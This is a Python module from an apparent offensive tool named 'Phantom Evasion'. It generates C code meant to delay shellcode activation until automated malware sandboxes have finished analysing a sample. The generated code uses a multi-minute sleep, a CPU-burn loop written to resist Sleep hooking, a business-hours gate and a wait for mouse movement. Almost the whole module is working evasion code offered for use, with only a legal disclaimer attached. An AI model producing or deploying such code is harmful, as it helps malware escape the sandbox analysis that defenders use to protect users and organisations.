"""
Phantom Evasion - Delayed Execution Sandbox Evasion

LEGAL DISCLAIMER:
For authorized penetration testing and security research ONLY.
Users must have explicit written permission from the target system owner.
"""

from typing import Dict, Any
import random


def generate_delayed_exec() -> Dict[str, Any]:
    """Generate C code for various delayed/triggered execution techniques.

    Automated sandboxes typically execute samples for a fixed window (30–120 s).
    Delayed execution techniques cause the payload to remain dormant past this
    window before activating, leading to a "clean" sandbox verdict.

    Techniques included:
        1. **Long sleep** – ``Sleep`` / ``NtDelayExecution`` for 5+ minutes.
        2. **CPU-burn delay** – busy-loop using ``GetTickCount64`` to waste time
           in a way that cannot be fast-forwarded by hooking ``Sleep``.
        3. **System event trigger** – wait until a specific time-of-day
           (office hours check) or until the screen has been unlocked for N minutes.

    Returns:
        Dict with keys ``code``, ``description``, ``layer``, ``name``.
    """
    sleep_minutes = random.randint(5, 10)
    sleep_ms = sleep_minutes * 60 * 1000

    code = f"""\
// Delayed Execution – generated by Phantom Evasion
// Layer 4 – Behavioral Evasion
// Delays shellcode activation to outlast automated sandbox analysis windows.

#include <windows.h>
#include <stdint.h>

// ── Method 1: Simple long sleep ───────────────────────────────────────────────
// Sleep for {sleep_minutes} minutes (sandbox timeout is usually < 5 min).
static void delay_long_sleep(void) {{
    Sleep({sleep_ms}UL);  // {sleep_minutes} minutes
}}

// ── Method 2: CPU-burn loop ───────────────────────────────────────────────────
// Sandboxes may hook Sleep() to fast-forward; this busy-wait cannot be skipped.
static void delay_cpu_burn(DWORD seconds) {{
    ULONGLONG deadline = GetTickCount64() + ((ULONGLONG)seconds * 1000ULL);
    volatile ULONGLONG dummy = 0;
    while (GetTickCount64() < deadline) {{
        dummy += GetTickCount64() ^ 0xDEADBEEFDEADBEEFULL;
    }}
    (void)dummy;
}}

// ── Method 3: Office-hours trigger ───────────────────────────────────────────
// Only proceed if the local time is within business hours (08:00 – 18:00).
static BOOL is_business_hours(void) {{
    SYSTEMTIME st = {{0}};
    GetLocalTime(&st);
    return (st.wHour >= 8 && st.wHour < 18);
}}

// ── Method 4: User activity check ────────────────────────────────────────────
// Wait until mouse has moved (indicates real user presence).
static void wait_for_user_activity(DWORD timeout_ms) {{
    POINT prev = {{0}}, cur = {{0}};
    GetCursorPos(&prev);
    ULONGLONG deadline = GetTickCount64() + timeout_ms;
    while (GetTickCount64() < deadline) {{
        Sleep(500);
        GetCursorPos(&cur);
        if (cur.x != prev.x || cur.y != prev.y) return;
    }}
}}

// ── Master delayed execution routine ─────────────────────────────────────────
static void perform_delayed_execution(void) {{
    // Method 2 is harder to bypass than Sleep hooks
    delay_cpu_burn(300);   // 5-minute busy wait

    // Then require business hours
    while (!is_business_hours()) Sleep(60000);

    // Finally wait for mouse activity
    wait_for_user_activity(120000);
}}
"""

    return {
        "code": code,
        "description": (
            f"Delayed execution: {sleep_minutes}-min sleep, CPU-burn loop, "
            "business-hours check, user-activity gate"
        ),
        "layer": "Layer 4 - Behavioral Evasion",
        "name": "delayed_exec",
    }
